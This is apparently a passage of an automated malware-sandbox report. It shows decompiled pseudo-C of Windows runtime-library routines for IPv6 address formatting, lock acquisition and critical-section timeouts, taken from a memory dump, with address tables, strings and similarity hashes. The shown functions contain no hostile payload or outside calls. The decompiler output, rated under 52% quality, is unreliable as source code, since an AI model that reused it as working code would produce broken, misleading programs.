				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02567707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02567707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02567707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02532340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0253E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                  0x025714c0
                                                                                                                                                  0x025714cb
                                                                                                                                                  0x025714d2
                                                                                                                                                  0x025714d6
                                                                                                                                                  0x025714da
                                                                                                                                                  0x025714de
                                                                                                                                                  0x025714e3
                                                                                                                                                  0x0257157a
                                                                                                                                                  0x0257157a
                                                                                                                                                  0x025714f1
                                                                                                                                                  0x025714f3
                                                                                                                                                  0x0259ea0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ea15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ea15
                                                                                                                                                  0x025714f9
                                                                                                                                                  0x025714f9
                                                                                                                                                  0x025714fe
                                                                                                                                                  0x02571504
                                                                                                                                                  0x0259ea1a
                                                                                                                                                  0x0259ea1f
                                                                                                                                                  0x0259ea21
                                                                                                                                                  0x0259ea22
                                                                                                                                                  0x0259ea27
                                                                                                                                                  0x0259ea2a
                                                                                                                                                  0x0259ea2a
                                                                                                                                                  0x02571515
                                                                                                                                                  0x02571517
                                                                                                                                                  0x0257156d
                                                                                                                                                  0x02571572
                                                                                                                                                  0x02571575
                                                                                                                                                  0x02571575
                                                                                                                                                  0x0257151e
                                                                                                                                                  0x0259ea50
                                                                                                                                                  0x0259ea55
                                                                                                                                                  0x0259ea58
                                                                                                                                                  0x0259ea58
                                                                                                                                                  0x0257152e
                                                                                                                                                  0x02571531
                                                                                                                                                  0x02571533
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02571535
                                                                                                                                                  0x02571541
                                                                                                                                                  0x02571549
                                                                                                                                                  0x02571549
                                                                                                                                                  0x02571533
                                                                                                                                                  0x025714f3
                                                                                                                                                  0x02571559

                                                                                                                                                  APIs
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 0259EA22
                                                                                                                                                    • Part of subcall function 025713CB: ___swprintf_l.LIBCMT ref: 0257146B
                                                                                                                                                    • Part of subcall function 025713CB: ___swprintf_l.LIBCMT ref: 02571490
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 0257156D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 81e14d116224e9d1eafa3597882b6a5a789fffb5ff9ddff5dcb87e88e9465fde
                                                                                                                                                  • Instruction ID: 0d83a973a9c9c51ea95c3cbdc0ba1979bc5b632106b2270a48c197bd0ea17faf
                                                                                                                                                  • Opcode Fuzzy Hash: 81e14d116224e9d1eafa3597882b6a5a789fffb5ff9ddff5dcb87e88e9465fde
                                                                                                                                                  • Instruction Fuzzy Hash: 8F21C3B29006199FDF21DE64DC45AEE77ADFB54704F448512EC4AD3140DB70AE588FE8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 025553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E025553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026101c0;
									_push(_t92);
									_push(0);
									_t37 = E0252F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02574FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02583F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02583F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E025B217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02583F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02573915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02555384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0252F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02573915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0252F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02573915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0252F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02573915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02555329(_t74, _t92);
													_push(1);
													_t48 = E025553A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                  0x025553ab
                                                                                                                                                  0x025553ae
                                                                                                                                                  0x025553b1
                                                                                                                                                  0x025553b4
                                                                                                                                                  0x025553b7
                                                                                                                                                  0x025705b6
                                                                                                                                                  0x025705c0
                                                                                                                                                  0x025705c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025705c9
                                                                                                                                                  0x025705c9
                                                                                                                                                  0x025705cc
                                                                                                                                                  0x025705d5
                                                                                                                                                  0x025705d5
                                                                                                                                                  0x025553bd
                                                                                                                                                  0x025553bd
                                                                                                                                                  0x025553bd
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592269
                                                                                                                                                  0x0259226d
                                                                                                                                                  0x02592349
                                                                                                                                                  0x0259234d
                                                                                                                                                  0x02592273
                                                                                                                                                  0x02592276
                                                                                                                                                  0x02592279
                                                                                                                                                  0x0259227e
                                                                                                                                                  0x02592283
                                                                                                                                                  0x02592287
                                                                                                                                                  0x0259228a
                                                                                                                                                  0x0259228d
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922be
                                                                                                                                                  0x025922c4
                                                                                                                                                  0x025922cc
                                                                                                                                                  0x025922d0
                                                                                                                                                  0x025922d6
                                                                                                                                                  0x025922d7
                                                                                                                                                  0x025922da
                                                                                                                                                  0x025922df
                                                                                                                                                  0x025922e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922e6
                                                                                                                                                  0x025922e9
                                                                                                                                                  0x025922f4
                                                                                                                                                  0x025922f9
                                                                                                                                                  0x025922fa
                                                                                                                                                  0x02592305
                                                                                                                                                  0x02592314
                                                                                                                                                  0x02592319
                                                                                                                                                  0x0259231a
                                                                                                                                                  0x0259231d
                                                                                                                                                  0x02592320
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592328
                                                                                                                                                  0x0259232d
                                                                                                                                                  0x0259232f
                                                                                                                                                  0x02592331
                                                                                                                                                  0x02592336
                                                                                                                                                  0x02592336
                                                                                                                                                  0x0259233b
                                                                                                                                                  0x0259233d
                                                                                                                                                  0x02592350
                                                                                                                                                  0x02592351
                                                                                                                                                  0x02592356
                                                                                                                                                  0x02592359
                                                                                                                                                  0x02592359
                                                                                                                                                  0x0259235b
                                                                                                                                                  0x0259235d
                                                                                                                                                  0x02555367
                                                                                                                                                  0x0255536b
                                                                                                                                                  0x02555372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592369
                                                                                                                                                  0x0259236a
                                                                                                                                                  0x0259236c
                                                                                                                                                  0x02592371
                                                                                                                                                  0x02592373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592379
                                                                                                                                                  0x02592379
                                                                                                                                                  0x0259237a
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x02592385
                                                                                                                                                  0x02592386
                                                                                                                                                  0x02592389
                                                                                                                                                  0x0259238e
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02555378
                                                                                                                                                  0x0255537c
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592397
                                                                                                                                                  0x0259239c
                                                                                                                                                  0x025923a2
                                                                                                                                                  0x025923a3
                                                                                                                                                  0x025923a6
                                                                                                                                                  0x025923ab
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b4
                                                                                                                                                  0x025923b9
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923bc
                                                                                                                                                  0x025923bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589153
                                                                                                                                                  0x02589158
                                                                                                                                                  0x0258915a
                                                                                                                                                  0x0258915e
                                                                                                                                                  0x02589160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589171
                                                                                                                                                  0x02589176
                                                                                                                                                  0x02589176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589160
                                                                                                                                                  0x025923c6
                                                                                                                                                  0x025923cb
                                                                                                                                                  0x025923ce
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02592373
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592293
                                                                                                                                                  0x02592295
                                                                                                                                                  0x0259229a
                                                                                                                                                  0x025922a1
                                                                                                                                                  0x025922a3
                                                                                                                                                  0x025922a7
                                                                                                                                                  0x025922a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922ab
                                                                                                                                                  0x025922ad
                                                                                                                                                  0x025922af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922af
                                                                                                                                                  0x025922b1
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259226d
                                                                                                                                                  0x025553cb
                                                                                                                                                  0x025553ce
                                                                                                                                                  0x025553d0
                                                                                                                                                  0x025553d4
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025553d8
                                                                                                                                                  0x025553e3
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025922F4
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025922FC
                                                                                                                                                  • RTL: Resource at %p, xrefs: 0259230B
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 02592328
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-871070163
                                                                                                                                                  • Opcode ID: 37bdf1a21dae3e2d510ca7391243988e032e68bc0566345c1da14a2cf027b7dd
                                                                                                                                                  • Instruction ID: 159baed7f8a511b62a231b443809cd4b8ea1b8320e2537a3fd696617f60634c0
                                                                                                                                                  • Opcode Fuzzy Hash: 37bdf1a21dae3e2d510ca7391243988e032e68bc0566345c1da14a2cf027b7dd
                                                                                                                                                  • Instruction Fuzzy Hash: 695108716106167BEF119F28DC80FA677A9BF85724F11421AFD09DB280F771E8458BA8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0255EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E0255EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0254DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x261793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025316C0(_t39);
				} else {
					_t40 = E0252F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02573915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x261793c; // 0x0
								_push(_t85);
								_t44 = E02531F28(_t71);
							} else {
								_t44 = E0252F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02573915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E025B2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0255EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02574FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02583F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02583F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26120c0;
								if(_t85 != 0x26120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E025B217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02583F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                  0x0255ec56
                                                                                                                                                  0x0255ec56
                                                                                                                                                  0x0255ec56
                                                                                                                                                  0x0255ec5c
                                                                                                                                                  0x0255ec64
                                                                                                                                                  0x025923e6
                                                                                                                                                  0x025923eb
                                                                                                                                                  0x025923eb
                                                                                                                                                  0x0255ec6a
                                                                                                                                                  0x0255ec6c
                                                                                                                                                  0x0255ec6f
                                                                                                                                                  0x025923f3
                                                                                                                                                  0x025923f8
                                                                                                                                                  0x025923fa
                                                                                                                                                  0x025923fc
                                                                                                                                                  0x0255ec75
                                                                                                                                                  0x0255ec76
                                                                                                                                                  0x0255ec76
                                                                                                                                                  0x0255ec7b
                                                                                                                                                  0x0255ec7c
                                                                                                                                                  0x0255ec7e
                                                                                                                                                  0x02592406
                                                                                                                                                  0x02592407
                                                                                                                                                  0x0259240c
                                                                                                                                                  0x0259240d
                                                                                                                                                  0x0259240d
                                                                                                                                                  0x0259240d
                                                                                                                                                  0x02592414
                                                                                                                                                  0x02592417
                                                                                                                                                  0x0259241e
                                                                                                                                                  0x02592435
                                                                                                                                                  0x02592438
                                                                                                                                                  0x0259243c
                                                                                                                                                  0x0259243f
                                                                                                                                                  0x02592442
                                                                                                                                                  0x02592443
                                                                                                                                                  0x02592446
                                                                                                                                                  0x02592449
                                                                                                                                                  0x02592453
                                                                                                                                                  0x02592455
                                                                                                                                                  0x0259245b
                                                                                                                                                  0x0259245b
                                                                                                                                                  0x0255eb99
                                                                                                                                                  0x0255eb99
                                                                                                                                                  0x0255eb9c
                                                                                                                                                  0x0255eb9d
                                                                                                                                                  0x0255eb9f
                                                                                                                                                  0x0255eba2
                                                                                                                                                  0x02592465
                                                                                                                                                  0x0259246b
                                                                                                                                                  0x0259246d
                                                                                                                                                  0x0255eba8
                                                                                                                                                  0x0255eba9
                                                                                                                                                  0x0255eba9
                                                                                                                                                  0x0255ebae
                                                                                                                                                  0x0255ebb3
                                                                                                                                                  0x0255ebb9
                                                                                                                                                  0x0255ebbb
                                                                                                                                                  0x02592513
                                                                                                                                                  0x02592514
                                                                                                                                                  0x02592519
                                                                                                                                                  0x0259251b
                                                                                                                                                  0x0255ec2a
                                                                                                                                                  0x0255ec2d
                                                                                                                                                  0x0255ec33
                                                                                                                                                  0x0255ec36
                                                                                                                                                  0x0255ec3a
                                                                                                                                                  0x0255ec3e
                                                                                                                                                  0x0255ec40
                                                                                                                                                  0x0255ec47
                                                                                                                                                  0x0255ec47
                                                                                                                                                  0x0255ec40
                                                                                                                                                  0x025322c6
                                                                                                                                                  0x0255ebc1
                                                                                                                                                  0x0255ebc1
                                                                                                                                                  0x0255ebc5
                                                                                                                                                  0x0255ec9a
                                                                                                                                                  0x0255ec9a
                                                                                                                                                  0x0255ebd6
                                                                                                                                                  0x0255ebd6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0255ebbb
                                                                                                                                                  0x02592477
                                                                                                                                                  0x0259247c
                                                                                                                                                  0x02592486
                                                                                                                                                  0x0259248b
                                                                                                                                                  0x02592496
                                                                                                                                                  0x0259249b
                                                                                                                                                  0x0259249d
                                                                                                                                                  0x025924a0
                                                                                                                                                  0x025924a3
                                                                                                                                                  0x025924aa
                                                                                                                                                  0x025924aa
                                                                                                                                                  0x025924a5
                                                                                                                                                  0x025924a5
                                                                                                                                                  0x025924a5
                                                                                                                                                  0x025924ac
                                                                                                                                                  0x025924af
                                                                                                                                                  0x025924b0
                                                                                                                                                  0x025924b3
                                                                                                                                                  0x025924b9
                                                                                                                                                  0x025924ba
                                                                                                                                                  0x025924bb
                                                                                                                                                  0x025924c6
                                                                                                                                                  0x025924cb
                                                                                                                                                  0x025924cd
                                                                                                                                                  0x025924d0
                                                                                                                                                  0x025924d1
                                                                                                                                                  0x025924d4
                                                                                                                                                  0x025924d6
                                                                                                                                                  0x025924d9
                                                                                                                                                  0x025924d9
                                                                                                                                                  0x025924dc
                                                                                                                                                  0x025924df
                                                                                                                                                  0x025924e1
                                                                                                                                                  0x025924e7
                                                                                                                                                  0x025924e9
                                                                                                                                                  0x025924ec
                                                                                                                                                  0x025924ef
                                                                                                                                                  0x025924f2
                                                                                                                                                  0x025924f2
                                                                                                                                                  0x025924ef
                                                                                                                                                  0x025924e7
                                                                                                                                                  0x025924fa
                                                                                                                                                  0x025924ff
                                                                                                                                                  0x02592501
                                                                                                                                                  0x02592503
                                                                                                                                                  0x02592506
                                                                                                                                                  0x0259250b
                                                                                                                                                  0x0255eb8c
                                                                                                                                                  0x0255eb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0255eb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0255eb99
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025924BD
                                                                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0259248D
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 025924FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
